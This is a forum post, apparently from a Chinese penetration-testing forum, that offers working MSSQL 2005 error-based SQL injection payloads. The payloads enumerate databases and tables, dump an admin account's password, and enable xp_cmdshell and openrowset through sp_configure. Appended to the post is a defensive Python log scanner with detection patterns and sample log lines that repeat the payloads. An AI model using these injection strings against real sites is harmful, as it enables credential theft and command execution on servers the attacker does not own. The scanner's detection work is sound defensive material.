China Network Penetration Testing Alliance

Title: MSsql2005 injection statements

Author: admin    Time: 2012-9-13 17:19

CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

Table-enumeration statement. The somedb part is the database whose tables are to be listed; increment the number 1 shown in red.

CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

Column-dump statement: dumps the password field for user='icerover' in the admin table.

CODE:
/**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

MSSQL 2005 does not enable xp_cmdshell by default, and openrowset cannot be used either.
With sa privileges, they can be enabled as follows.

Enable openrowset

CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

Enable xp_cmdshell

CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

OK, over~~ good night
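
For defenders, an added example that is not part of the original post: a Python sketch that flags requests shaped like the statements above in web server access logs, by undoing URL encoding and treating /**/ comments as whitespace before matching. The log lines, the /news.asp path and the rule names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rule name -> pattern, matched against the normalised request URI.
RULES = {
    # System catalogs read by the enumeration statements.
    "catalog_enumeration": re.compile(r"\b(sysdatabases|sys\.all_objects)\b"),
    # sp_configure switching on the features the post enables.
    "feature_enable": re.compile(
        r"sp_configure\s+'(xp_cmdshell|ad\s+hoc\s+distributed\s+queries"
        r"|show\s+advanced\s+options)'\s*,\s*1"),
    # "and (select top 1 ...) = 0": a subquery result compared with an integer.
    "subquery_eq_zero": re.compile(
        r"\band\s*\(\s*select\s+top\s+1\b.*\)\s*=\s*0"),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalise(raw):
    """Decode up to two layers of URL encoding and drop inline comments."""
    text = raw
    for _ in range(2):
        text = unquote_plus(text)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)  # /**/ acts as a space
    return re.sub(r"\s+", " ", text).lower()

def scan(raw):
    """Return the sorted names of all rules that match one request URI."""
    text = normalise(raw)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan_log(lines):
    """Return (line number, matched rules) for each suspicious log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if m and (found := scan(m.group(1))):
            hits.append((n, found))
    return hits

# Constructed access-log lines (documentation IP range, made-up path).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2020:10:00:00 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2020:10:00:05 +0000] "GET /news.asp?id=12/**/and/**/'
    '(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/'
    'somedb.sys.all_objects)%3d0-- HTTP/1.1" 500 1208',
    '203.0.113.7 - - [01/Jan/2020:10:00:09 +0000] "GET /news.asp?id=12;EXEC/**/'
    "sp_configure/**/'xp_cmdshell',1;RECONFIGURE;-- HTTP/1.1\" 200 5120",
]

if __name__ == "__main__":
    for lineno, rules in scan_log(SAMPLE):
        print(lineno, rules)
```
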




